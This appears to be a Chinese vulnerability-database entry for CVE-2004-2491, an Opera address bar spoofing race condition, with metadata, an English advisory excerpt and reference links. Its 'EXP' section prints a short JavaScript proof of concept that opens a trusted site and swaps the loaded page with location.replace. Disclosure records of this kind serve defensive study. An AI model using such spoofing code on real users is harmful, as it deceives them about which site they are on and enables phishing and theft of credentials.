Opera Web Browser Javascript 'location.replace'地址栏伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108088 漏洞类型 竞争条件
发布时间 2004-07-27 更新时间 2006-01-25
CVE编号 CVE-2004-2491 CNNVD-ID CNNVD-200412-560
漏洞平台 Multiple CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/24325
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-560
|漏洞详情
Operawebbrowser是一款流行的WEB浏览器。Opera浏览器在处理JavaScript脚本时存在问题,远程攻击者可以利用这个漏洞建立HTML在地址栏中伪造URL。远程攻击者可以构建包含特殊的JavaScript的HTML页面,当被Opera解析时,装载的URL可以以实际不同的URL显示在地址栏中,从而达到欺骗用户的目的。
|漏洞EXP
source: http://www.securityfocus.com/bid/10810/info

Opera Web Browser is prone to a security weakness that may permit malicious web pages to spoof address bar information. This issue is due to a race condition error.

This issue may be leveraged by an attacker to display false information in the address bar of an unsuspecting user, allowing an attacker to present web pages to users that seem to be derived from a trusted location. This may facilitate phishing attacks; attempted theft of user information for the purpose of identity theft.

<script>
function fake() {
 oc=window.open('http://www.opera.com/', '','location=1');
 oc.location.replace('http://www.example.com');
}
[/script]
<a href="javascript:void(0);" onClick="fake()">http://www.opera.com/</a>
|参考资料

来源:BID
名称:10810
链接:http://www.securityfocus.com/bid/10810
来源:www.opera.com
链接:http://www.opera.com/windows/changelogs/754/
来源:SECUNIA
名称:12162
链接:http://secunia.com/advisories/12162
来源:XF
名称:opera-addressbar-spoofing(16816)
链接:http://xforce.iss.net/xforce/xfdb/16816
来源:OSVDB
名称:8317
链接:http://www.osvdb.org/8317
来源:FULLDISC
名称:20040726Opera7.53(Build3850)AddressBarSpoofingIssue
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1056.html
来源:NSFOCUS
名称:6743
链接:http://www.nsfocus.net/vulndb/6743